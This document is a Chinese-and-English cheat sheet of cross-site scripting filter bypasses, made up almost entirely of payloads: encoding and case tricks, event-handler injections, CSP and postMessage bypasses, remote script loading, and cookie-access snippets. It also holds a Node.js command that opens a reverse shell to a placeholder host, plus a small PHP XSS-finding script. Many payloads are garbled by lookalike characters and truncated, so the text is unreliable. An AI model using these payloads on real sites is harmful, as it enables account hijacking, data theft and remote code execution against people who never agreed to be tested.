xss绕过思路

1、前端限制绕过（比如：JS），直接抓包改包重放，或者修改html前端代码
2、大小写绕过，比如：<SCript> alERT(/XSS/) </SCript>
3、拼凑：<scri<script>pt> alert(/XSS/) </scri</script>pt>
4、使用注释进行干扰：<scr<!--test-->ipt>alert(/xss/)</s<!--test-->cript>
后台过滤了特殊字符，比如<script>标签，但该标签可以被各种编码，后台不一定会过滤，当浏览器对该编码进行识别时，会翻译成正常的标签，从而执行
5、闭合前后标签，比如：1"><script>alert(/XSS/)</script>< 
6、过滤< >但是不过滤 " 触发事件
" onmouseover =alert(document.domain) name="1 或者" οnmοuseοver=alert(document.domain)%0a　
onmouseover是鼠标移到上面就会触发的事件
" οnclick=alert(document.domain) name="1
onclick是鼠标点击会触发事件
7、过滤了>< " 并且"空格  空格之后的内容被截断了
" onmouseover =alert(document.domain) name="1
" onmouseover =alert(document.domain) 
test onmouseover=alert(document.domain)
8、<a>标签内超链接 URL
9、script会被替换为xscript　on事件会被替换为onxxx   style会被替换为stxxx，尝试用tab制表(%09)，换行(%0a,%0d,%0a%0d)等符号都不行。
javascript:alert(document.domain)
构造<a>标签在超链接中执行js，构造时将script中任意一个字母用Unicode编码
"><a href="java&#115;cript:alert(document.domain)">1</a>
10、< > " 空格 被过滤为空，想用编码能不能绕过（因为过滤了<>",HTML实体是不行的，html实体不能让内容逃出来），
ie浏览器会把 ` `（笔记本1左边那颗键两次）识别为双引号，从而让我们的内容逃出来（<>没法逃就设置属性）
``onmouseover=alert(document.domain)
11、<变成了&lt;    >变成了&gt   
16进制编码绕过   \x3cscript\x3ealert(document.domain);\x3c/script\x3e
uncode编码绕过   \u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e
在线16进制加密解密网址：https://www.cnblogs.com/gggzly/p/8853779.html
在线uncode编码编码网址：https://www.css-js.com/tools/unicode.html
<img src=x onerror="top'al'+'ert' (http://0)"></img>
1">)<img src=1>
<img src="x" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=1 onerror=alert(1)>

Reflected XSS

Persistent XSS

DOM-based XSS

Mutation XSS

Universal Cross-site Scripting (UXSS)

通用跨站脚本攻击(UXSS)

Mannix

“>”><"<"

javascript关键字过滤 +加号过滤

document.cookie

document[‘coo’‘CONCAT’.toLowerCase()]

圆括号过滤

alert(1)

alert1

;分号过滤

单、双、反引号过滤

eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//

.过滤

with(location)alert(hash)

html标签过滤、属性名过滤

<video width=“0” height=“0” οncanplay=alert0>

img

svg

body

html

embed

script

object

details

isindex

iframe

audio

video

过滤alert

top’aler’+‘t’

[1].find(confirm)

[1].map(confirm)

[1].some(confirm)

[1].every(confirm)

[1].filter(confirm)

[1].findIndex(confirm)

[1].map(alert)

[1].find(alert)

[1].every(alert)

[1].filter(alert)

[1].findIndex(alert)

[1].some(alert)

alert(document.domain)

YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

<svg οnlοad=eval(atobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==)>

<svg οnlοad=eval(atobYWxlcnQoMSk=)>

<svg οnlοad=setTimeout(atobYWxlcnQoMSk=)>

<svg οnlοad=setInterval(atobYWxlcnQoMSk=)>

<svg οnlοad=selfev+al>

右下角或者左上角弹窗

HTML Context – Simple Tag Injection

“>

HTML Context – In Block Tag Injection

“>

HTML Context – Inline Injection

"οnmοuseοver=alert(1)//

"autofocus/οnfοcus=alert(1)//

HTML Context – Source Injection

href, src, data

,action,formaction

data:,alert(1)

javascript:alert(1)

data:text/html,

Javascript Context – Code Injection

‘-alert(1)-’

'-alert(1)//

连接符号：

+(%2b) - * / % ^ < > <= >= == === != !== ; | %0a %0A %0d %0D %0a%0d %0A%0D //

t.mhz.pw/game/xss/sc…

t.mhz.pw/game/xss/sc…

Javascript Context – Code Injection with Escape Bypass

'-alert(1)//

Javascript Context – Code Injection in Logical Block

‘}alert(1);{’

‘}alert(1)%0A{’

'}alert(1);{//

Javascript Context – Tag Injection

Multi Reflection – Double Reflection (Single Input)

‘οnlοad=alert(1)><svg/1=’

‘>alert(1)<script/1=’

/alert(1)

Multi Reflection – Triple Reflection (Single Input)

/alert(1)">'οnlοad="/ <svg/1=’

-alert(1)">'onload="<svg/1=’

/’>alert(1)/ <script/1=’

Multi Input Reflections (Double & Triple)

p=<svg/1=’&q='οnlοad=alert(1)>

p=<svg 1=’&q=‘οnlοad=’/ &r=/alert(1)’>

File Upload Injection – Filename

">

File Upload Injection – Metadata

exiftool -Artist=’">

File Upload Injection – SVG File

DOM Insert Injection

## DOM Insert Injection – Resource Request

data:text/html,

data:text/html,

PHP_SELF Injection

brutelogic.com.br/xss.php/">

Script Injection – No Closing

Unclosed Tags

<svg οnlοad=alert(1)//

<svg οnlοad=“alert(1)”

Uppercase XSS

Extra Content for Script Tags

<script/x>alert(1)

Double Encoded XSS

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Alert without Parentheses (Strings Only)

alert1

Alert without Parentheses

setIntervalalert\x28document.domain\x29

setTimeoutalert\x28document.domain\x29

Alert without Parentheses (Tag Exclusive)

Alert without Alphabetic Chars

[][’\146\151\154\164\145\162’][’\143\157\156\163\164\162\165\143\164\157\162’]

(’\141\154\145\162\164\50\61\51’)()

Alert Obfuscation

top window parent self this frames

(alert)(1)

a=alert,a(1)

[1].find(alert)

top"al"+“ert”

top/al/.source+/ert/.source

al\u0065rt(1)

top’al\145rt’

top8680439…toString(30)

File Upload Injection – HTML/js GIF Disguise

GIF89a=//

alert(1)//;

Jump to URL Fragment

eval(URL.slice(-8)) #alert(1)

eval(location.hash.slice(1)) #alert(1)

document.write(decodeURI(location.hash)) #<img/src/οnerrοr=alert(1)>

• (Webkit only)

<svg/οnlοad=innerHTML=location.hash> #<img/src/οnerrοr=alert(1)>

HTML Alternative Separators

Tag Scheme:

<name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]>

[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +

[3] & [4] => %09, %0A, %0C, %0D, %20, + and ’ or " in both

[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ’ or " in both

Strip Tags Based Bypass

"οnmοuseοver=alert(1)//

"autofocus οnfοcus=alert(1)//

2nd Order XSS Injection

<svg/οnlοad=alert(1)>

Event Origin Bypass for postMessage() XSS

facebook.com.localhost/crosspwn.ph…?

target=//brutelogic.com.br/tests/status.html&msg=

CSP Bypass (for Whitelisted Google Domains)

{

{constructor.constructor('alert(1)')()}}

Vectors without Event Handlers

Javascript Execution Delay

οnlοad=function(){$.getScript(’//brutelogic.com.br/2.js’)}

οnlοad=x=>$.getScript(’//brutelogic.com.br/2.js’)

Valid Source for Image Tags

<img

src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=

οnlοad=alert(1)>

Shortest XSS

## Mobile-only Event Handlers ## Body Tag click this!#x #x










\

\

#x

press F12! press F1! ## Less Known XSS Vectors

12

target=//brutelogic.com.br/tests/status.html&msg=

Where “facebook.com” is an allowed origin and “localhost” is attacking domain,

“//brutelogic.com.br/tests/status.html” is target page and

“

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?

a=<body/οnresize=alert(document.domain)>

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?

a=<svg/οnlοad=eval(name)>&name=alert(document.domain)

CrossPwn

name="<?php echo $_GET['name'] ?>" height=“0”

style=“visibility:hidden”>

## Simple XSS Finder Script for PHP (Static Analysis) if [ -z $1 ]

then

echo -e “Usage:\n$0 FILE\n$0 -r FOLDER”

exit

else

f=$1

fi

sources=(GET POST REQUEST “SERVER['PHP” “SERVER['PATH_” "SERVER\

['REQUEST_U")

sinks=(? echo die print printf print_r var_dump)

xssam(){

for i in ${sources[@]}

do

a=$(grep -in “$_${i}” $f | grep -o “$.*=” | sed “s/[ ]?=//g” | sort -u)

for j in ${sinks[@]}

do

grep --color -in “${j}.*$_${i}” $f

for k in $a

do

grep --color -in “ j . ∗ {j}.* j.∗k” $f

done

done

done

}

if [ $f != “-r” ]

then

xssam

else

for i in $(find $2 -type f -name “*.php”)

do

echo “File: $i”

f=$i

xssam

done

fi

Node.js RCE

Javascript:

require(‘child_process’).exec(‘bash -c “bash -i >& /dev/tcp/HOST/5855 0>&1”’)

nc -lp 5855

ASCII Encoding Table

Remember to replace “&” and “#” in URLs

with their encoded version (%26 and %23 respectively).

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

'"()%26%25

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E

'"()%26%25